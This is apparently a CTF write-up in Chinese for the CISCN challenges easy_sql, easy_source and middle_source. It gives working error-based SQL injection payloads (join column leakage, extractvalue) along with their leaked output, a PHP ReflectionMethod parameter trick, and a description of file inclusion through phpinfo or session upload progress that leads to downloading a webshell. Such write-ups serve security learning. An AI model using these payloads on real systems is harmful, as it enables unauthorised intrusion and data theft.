# easy_sql:

join 爆列名

admin')||extractvalue(1,concat(0x7e,(select * from (select * from flag as a join (select * from flag)b using(id,no))c)))#

//Duplicate column name 'e0f1d955-bbba-43c3-b078-a81b3fc4bf28'

admin')||(extractvalue(1,concat(0x7e,(select `e0f1d955-bbba-43c3-b078-a81b3fc4bf28` from security.flag),0x7e)))#

//XPATH syntax error: '~CISCN{JgHhs-jpd52-iJk4O-MGPDz-d'

admin')||(extractvalue(1,concat(0x7e,substr((select `e0f1d955-bbba-43c3-b078-a81b3fc4bf28` from security.flag),32,50),0x7e)))#

//XPATH syntax error: '~uFWI-}~'

知道列名和表，之后就是直接查询就行了

❤这个是知识盲区，以后一定要熟练掌握

# easy_source

原题，ReflectionMethod 构造 User 类中的函数方法，再通过 getDocComment 获取函数的注释

提交参数：

?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment

🎃学习了 php 的一些内置函数

# middle_source

首页给了任意文件包含

扫目录得到.listing，得到 you_can_seeeeeeee_me.php 是 phpinfo 页面

有了 phpinfo 可以尝试直接向 phpinfo 页面传文件加垃圾数据，同时从 phpinfo 获取临时文件名进行文件包含，或者利用 session.upload_progress 进行 session 文件包含

😀我直接好家伙，学习了 phpinfo 的俩种利用姿势 ！

从 phpinfo 得到了 session 保存路径：/var/lib/php/sessions/fccecfeaje/

尝试发现可以出网，虽然 ban 了很多函数，但是可以直接用 copy 或 file_get_contents 下载 shell